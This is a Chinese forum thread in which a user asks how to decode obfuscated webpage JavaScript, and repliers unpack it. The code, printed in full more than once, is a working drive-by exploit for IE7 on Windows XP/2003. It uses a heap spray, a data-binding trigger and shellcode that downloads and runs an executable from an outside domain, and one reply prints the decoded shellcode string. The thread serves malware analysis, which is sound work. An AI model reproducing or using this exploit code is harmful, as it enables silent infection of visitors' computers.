1   1  /  1  页   跳转

[求助] 网页代码解密问题,求助!

网页代码解密问题,求助!

请问如何使用Freshow解密下列代码:

/*rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr*/
<script language="javascript">
if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x69\x65 \x37")==-1)location.replace("\x61\x62\x6F\x75\x74\x3A\x62\x6C\x61\x6E\x6B");</script><script>function sleep(KIZS1){var qQI_QKE2=new window["\x44\x61\x74\x65"]()["\x67\x65\x74\x54\x69\x6d\x65"]();for(var rrBravDu3=0;rrBravDu3<1e7;rrBravDu3++){if((new window["\x44\x61\x74\x65"]()["\x67\x65\x74\x54\x69\x6d\x65"]()-qQI_QKE2)>KIZS1){break}}}function spray(ueH4){var Ki5=0x0a0a0a0a;var AmqoX6=window["\x75\x6e\x65\x73\x63\x61\x70\x65"];var Ozy7=AmqoX6(ueH4);var bDMp_v8=0x100000;var seMDauV9=Ozy7["\x6c\x65\x6e\x67\x74\x68"]*2;var T10=bDMp_v8-(seMDauV9+0x038);var Hoo$TKIu11=AmqoX6("\x25\x75\x30\x61\x30\x61\x25\x75\x30\x61\x30\x61");Hoo$TKIu11=getSampleValue(Hoo$TKIu11,T10);aaablk=(Ki5-0x100000)/bDMp_v8;zzchuck=new window["\x41\x72\x72\x61\x79"]();for(i=0;i<aaablk;i++){zzchuck=Hoo$TKIu11+Ozy7}}function getSampleValue(YOTs12,cRMZ13){while(YOTs12["\x6c\x65\x6e\x67\x74\x68"]*2<cRMZ13){YOTs12+=YOTs12}YOTs12=YOTs12["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,cRMZ13/2);return YOTs12}
</script>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1H 7="%u";1I(7+"1G"+7+"%d%d%d"+7+"1F%1D%1E%1J%1%1K%1P%1%1O%1N%i%1L%1M%1C%1B%8%1s%1t%1%1r%1q%1o%1p%1u%j%m%1%1v%1A%5%y%1z%1y%1w%1%c%1x%1Q%1%1R%2b%4%2c%2a%29%1%2%27%4%28%2d%2e%1%2%2j%4%2i%2h%2f%1%2%2g%4%26%25%1W%1%2%1X%4%1V%1n%1S%1%2%1T%4%1Y%1Z%24%1%2%23%22%5%2%20%21%2k%1b%H%I%G%F%D%E%J%n%K%P%q%Q%1%2%O%C%L%M%6%R%l%A%z%B%l%N%1%1m%1d%1e%v%1c%x%S%g%6%19%1a%1%e%m%1%1f%1g%i%1l%1k%1j%1h%1i%18%17%X%Y%W%V%T%U%Z%10%15%16%14%13%11%12%1U%3L%3C%3D%3B%3A%3y%3z%3E%3F%3K%3J%3I%3G%2l%3H%k%3x%3w%3n%3o%3m%3l%1%3j%3k%3p%3q%9%1%3v%j%9%1%3u%3t%3r%3s%3M%40%f%46%1%v%n%45%44%42%43%47%f%48%4e%h%4d%4c%49%4a%4b%41%3R%6%3S%3Q%3P%a%3N%3O%3T%3U%h%3Z%3Y%3X%6%s%3V%3W%3i%1%3h%2F%2G%2E%2D%2B%2C%2H%2I%x%2N%2M%2L%a%e%9%1%2J%2K%8%k%2A%2z%g%o%5%y%2q%2r%2p%2o%2m%w%b%t%r%2n%p%2s%w%b%t%r%2t%p%2y%2x%b%2w%2u%2v%2O%s%2P%39%a%38%1%37%35%1%36%3a%3b%3g%3f%o%5%c%3e%3c%3d%34%5%c%33%2U%8%2V%2T%2S%q%2Q%2R%2W%2X%32%31%30%2Y%2Z%3%3%3%3%3%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%3");',62,263,'u2021|u0000|u8900|u2020|u6856|u020f|u55ff|a1|uffff|u0100|u0002|ub70f|uff00|u9090|uc481|u0447|u5756|u47c7|u0004|uec81|u048b|u0544|u0200|u0455|uecb9|u7500|u702f|ufffb|u8b04|u8118||uff57|u06e8|uff56|u8b00|u652e|u5c28|uc778|u7f6a|u8d00|u285d|u004e|u4f2c|u4d4c|u45c7|uff53|u6850|u5d8d|u5328|u652c|u2445|u1a36|u3fe8|uc71c|u2455|u768b|u0320|u56f3|u0378|u8b3c|u1e74|u33f3|u49c9|u10be|uf23a|u0ff6|u3356|uad41|uc303|u738b|u560c|ue80c|u0062|u5255|u2075|u8d56|u287d|u3361|uc2c0|u087d|u5d8b|u8b53|u51ec|u8b55|u5600|u7c0d|u1c70|u8bad|u8b0c|u408b|ua164|u0030|u0870|uec8b|ubb85|ue903|u0fc0|u8503|ue8bb|uffe4|ue8e0|u17eb|u645e|6090|9090|var|spray|u30a1|u0500|uf300|uffa4|u00b9|uf88b|u0800|u0221|u895b|u79e8|u0845|u0874|ufcaa|u87e8|u1045|u84e7|ub469|u3303|uc7f6|ue0bb|u1445|u6be8|u7946|uc61b|u0c45|u4e8e|ub1e8|u0e8a|u205d|ufe98|uec0e|ua3e8|u95e8|u1c45|ub8e5|u79c1|u0445|u2845|u1c5a|u83db|u0015|u33c9|u3350|u8519|u75db|u833e|u0035|u6afb|u2575|u8318|u02e8|u8330|u5251|u5324|u348d|u5508|u12eb|uf9e2|u0834|u0474|u406a|u046a|ue8c3|uff69|u0c80|u06c7|u1055|uc083|ub830|u7070|u6870|u2f3a|u7074|ufdda|u7468|u6868|u7373|u7865|u0065|u2e31|u2f6e|u632e|ue820|ue4b8|u1000|u006a|u6801|u0068|u0fe0|u10ff|u0689|u5a5e|u5b59|u5f01|u1824|u4489|u3900|u8008|u5e00|u80bf|u92e9|u0008|u595b|uc25d|u020c|ub900|uc710|u6e07|uc783|ufc8b|ua4f3|u5ec5|u038b|u755e|u5ae5|ufe3b|uf1eb|u030d|u40f2|ueb8b|u5a8b|u8b4b|udd03|u0c8b|u66dd|u0324|ucec1|u6474|u3089|u07c7|u0fe4|ub8f0|u5057|u8b08|u736d|u6376|u3c48|u8c8b|u5700|u0074|u7204|uc76c|u0070|u5207|u6c74|uc724|u4589|u006c|uc741|u6c6c|uc748|u0c47|u6165|u6574|u6108|u636f'.split('|'),0,{}))




</script>
<script>
sleep(0);</script><script>nav=navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"]["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]();if(navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x4d\x53\x49\x45')!=-1){version=window["\x70\x61\x72\x73\x65\x46\x6c\x6f\x61\x74"](navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]["\x73\x70\x6c\x69\x74"]('\x4d\x53\x49\x45')[1])}if(version==7){w2k3=((nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x6e\x74 \x35\x2e\x32')!=-1)||(nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x32\x30\x30\x33')!=-1));wxp=((nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x6e\x74 \x35\x2e\x31')!=-1)||(nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x78\x70')!=-1));if(wxp||w2k3)window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x58\x4d\x4c \x49\x44\x3d\x49\x3e\x3c\x58\x3e\x3c\x43\x3e\x3c\x21\x5b\x43\x44\x41\x54\x41\x5b\x3c\x69\x6d\x61\x67\x65 \x53\x52\x43\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x26\x23\x31\x31\x34\x3b\x26\x23\x32\x35\x37\x30\x3b\x26\x23\x31\x31\x34\x3b\x2e\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x5d\x5d\x3e\x3c\x21\x5b\x43\x44\x41\x54\x41\x5b\x3e\x5d\x5d\x3e\x3c\x2f\x43\x3e\x3c\x2f\x58\x3e\x3c\x2f\x78\x6d\x6c\x3e\x3c\x53\x50\x41\x4e \x44\x41\x54\x41\x53\x52\x43\x3d\x23\x49 \x44\x41\x54\x41\x46\x4c\x44\x3d\x43 \x44\x41\x54\x41\x46\x4f\x52\x4d\x41\x54\x41\x53\x3d\x48\x54\x4d\x4c\x3e\x3c\x58\x4d\x4c \x49\x44\x3d\x49\x3e\x3c\x2f\x58\x4d\x4c\x3e\x3c\x53\x50\x41\x4e \x44\x41\x54\x41\x53\x52\x43\x3d\x23\x49 \x44\x41\x54\x41\x46\x4c\x44\x3d\x43 \x44\x41\x54\x41\x46\x4f\x52\x4d\x41\x54\x41\x53\x3d\x48\x54\x4d\x4c\x3e\x3c\x2f\x53\x50\x41\x4e\x3e');var HDuVThUk1=1;while(HDuVThUk1<=10){window["\x73\x74\x61\x74\x75\x73"]=" ";HDuVThUk1++}}var jkfd="fd";

</script>

/*rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr*/

详细叙述下过程,尽量简洁明了哈~小弟刚学着使用Freshow。


用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
分享到:
gototop
 

回复:网页代码解密问题,求助!

楼主咋不去剑盟问呢

看看剑盟哪里有多少解密的
gototop
 

回复:网页代码解密问题,求助!

第一段可以搞出:
!~sNRLMON/pc:\c.exeY_d0 phQu<.xVv 3IA8t
;&u^^$f K€ct
WRW@N@QRjWWWhttp://hi.baidu.com/greysign

,胡搞的
第二段
<script>
sleep(0);</script><script>nav=navigator["userAgent"]["toLowerCase"]();if(navigator["appVersion"]["indexOf"]('MSIE')!=-1){version=window["parseFloat"](navigator["appVersion"]["split"]('MSIE')[1])}if(version==7){w2k3=((nav["indexOf"]('windows nt 5.2')!=-1)||(nav["indexOf"]('windows 2003')!=-1));wxp=((nav["indexOf"]('windows nt 5.1')!=-1)||(nav["indexOf"]('windows xp')!=-1));if(wxp||w2k3)window["document"]["write"]('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');var HDuVThUk1=1;while(HDuVThUk1<=10){window["status"]=" ";HDuVThUk1++}}var jkfd="fd";

</script>
gototop
 

回复:网页代码解密问题,求助!

最后得到是http://pppphhhss.cn/1.exe
gototop
 

回复:网页代码解密问题,求助!

Freshow是解不出这个的.可以用其它工具也行.malzilla也行的.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1H 7="%u";1I(7+"1G"+7+"%d%d%d"+7+"1F%1D%1E%1J%1%1K%1P%1%1O%1N%i%1L%1M%1C%1B%8%1s%1t%1%1r%1q%1o%1p%1u%j%m%1%1v%1A%5%y%1z%1y%1w%1%c%1x%1Q%1%1R%2b%4%2c%2a%29%1%2%27%4%28%2d%2e%1%2%2j%4%2i%2h%2f%1%2%2g%4%26%25%1W%1%2%1X%4%1V%1n%1S%1%2%1T%4%1Y%1Z%24%1%2%23%22%5%2%20%21%2k%1b%H%I%G%F%D%E%J%n%K%P%q%Q%1%2%O%C%L%M%6%R%l%A%z%B%l%N%1%1m%1d%1e%v%1c%x%S%g%6%19%1a%1%e%m%1%1f%1g%i%1l%1k%1j%1h%1i%18%17%X%Y%W%V%T%U%Z%10%15%16%14%13%11%12%1U%3L%3C%3D%3B%3A%3y%3z%3E%3F%3K%3J%3I%3G%2l%3H%k%3x%3w%3n%3o%3m%3l%1%3j%3k%3p%3q%9%1%3v%j%9%1%3u%3t%3r%3s%3M%40%f%46%1%v%n%45%44%42%43%47%f%48%4e%h%4d%4c%49%4a%4b%41%3R%6%3S%3Q%3P%a%3N%3O%3T%3U%h%3Z%3Y%3X%6%s%3V%3W%3i%1%3h%2F%2G%2E%2D%2B%2C%2H%2I%x%2N%2M%2L%a%e%9%1%2J%2K%8%k%2A%2z%g%o%5%y%2q%2r%2p%2o%2m%w%b%t%r%2n%p%2s%w%b%t%r%2t%p%2y%2x%b%2w%2u%2v%2O%s%2P%39%a%38%1%37%35%1%36%3a%3b%3g%3f%o%5%c%3e%3c%3d%34%5%c%33%2U%8%2V%2T%2S%q%2Q%2R%2W%2X%32%31%30%2Y%2Z%3%3%3%3%3%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%3");',62,263,'u2021|u0000|u8900|u2020|u6856|u020f|u55ff|a1|uffff|u0100|u0002|ub70f|uff00|u9090|uc481|u0447|u5756|u47c7|u0004|uec81|u048b|u0544|u0200|u0455|uecb9|u7500|u702f|ufffb|u8b04|u8118||uff57|u06e8|uff56|u8b00|u652e|u5c28|uc778|u7f6a|u8d00|u285d|u004e|u4f2c|u4d4c|u45c7|uff53|u6850|u5d8d|u5328|u652c|u2445|u1a36|u3fe8|uc71c|u2455|u768b|u0320|u56f3|u0378|u8b3c|u1e74|u33f3|u49c9|u10be|uf23a|u0ff6|u3356|uad41|uc303|u738b|u560c|ue80c|u0062|u5255|u2075|u8d56|u287d|u3361|uc2c0|u087d|u5d8b|u8b53|u51ec|u8b55|u5600|u7c0d|u1c70|u8bad|u8b0c|u408b|ua164|u0030|u0870|uec8b|ubb85|ue903|u0fc0|u8503|ue8bb|uffe4|ue8e0|u17eb|u645e|6090|9090|var|spray|u30a1|u0500|uf300|uffa4|u00b9|uf88b|u0800|u0221|u895b|u79e8|u0845|u0874|ufcaa|u87e8|u1045|u84e7|ub469|u3303|uc7f6|ue0bb|u1445|u6be8|u7946|uc61b|u0c45|u4e8e|ub1e8|u0e8a|u205d|ufe98|uec0e|ua3e8|u95e8|u1c45|ub8e5|u79c1|u0445|u2845|u1c5a|u83db|u0015|u33c9|u3350|u8519|u75db|u833e|u0035|u6afb|u2575|u8318|u02e8|u8330|u5251|u5324|u348d|u5508|u12eb|uf9e2|u0834|u0474|u406a|u046a|ue8c3|uff69|u0c80|u06c7|u1055|uc083|ub830|u7070|u6870|u2f3a|u7074|ufdda|u7468|u6868|u7373|u7865|u0065|u2e31|u2f6e|u632e|ue820|ue4b8|u1000|u006a|u6801|u0068|u0fe0|u10ff|u0689|u5a5e|u5b59|u5f01|u1824|u4489|u3900|u8008|u5e00|u80bf|u92e9|u0008|u595b|uc25d|u020c|ub900|uc710|u6e07|uc783|ufc8b|ua4f3|u5ec5|u038b|u755e|u5ae5|ufe3b|uf1eb|u030d|u40f2|ueb8b|u5a8b|u8b4b|udd03|u0c8b|u66dd|u0324|ucec1|u6474|u3089|u07c7|u0fe4|ub8f0|u5057|u8b08|u736d|u6376|u3c48|u8c8b|u5700|u0074|u7204|uc76c|u0070|u5207|u6c74|uc724|u4589|u006c|uc741|u6c6c|uc748|u0c47|u6165|u6574|u6108|u636f'.split('|'),0,{}))




</script>
这个代码中的eval改成<textarea id="textareaID" rows="50" cols="100"></textarea><script language="javascript"> document.getElementById("textareaID").innerText=
保存为htm,运行就能得到
var a1="%u";spray(a1+"9090"+a1+"%u9090%u9090%u9090"+a1+"6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u702f%u7070%u6870%u6868%u7373%u632e%u2f6e%u2e31%u7865%u0065%u2020%u2020%u2020%u2020%u2020%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2021%u2020");
才用Freshow解密就可.得到http://pppphhhss.cn/1.exe
gototop
 

回复:网页代码解密问题,求助!

瑞星 20.0 21.12.02.00 2009-01-12 Trojan.DL.Win32.MyDown.bfs
gototop
 

回复:网页代码解密问题,求助!

gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT